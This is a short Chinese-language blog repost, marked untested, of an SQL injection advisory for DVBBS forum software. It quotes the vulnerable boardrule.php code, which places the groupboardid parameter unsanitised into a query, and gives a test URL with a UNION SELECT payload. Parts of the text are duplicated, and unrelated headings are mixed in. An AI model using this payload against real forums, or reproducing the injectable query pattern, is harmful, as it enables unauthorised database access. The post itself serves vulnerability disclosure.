Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件内存破坏漏洞
买了本<信息安全风险评估>
March 13, 2008 15:31 | by
来源:鬼仔's Blog
PS:在鬼仔那看到的,未测试。。
相关代码:
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试:
PS:在鬼仔那看到的,未测试。。
相关代码:
function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
}
else{
$rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
}
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
}
else{
$rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
}
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试:
http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*
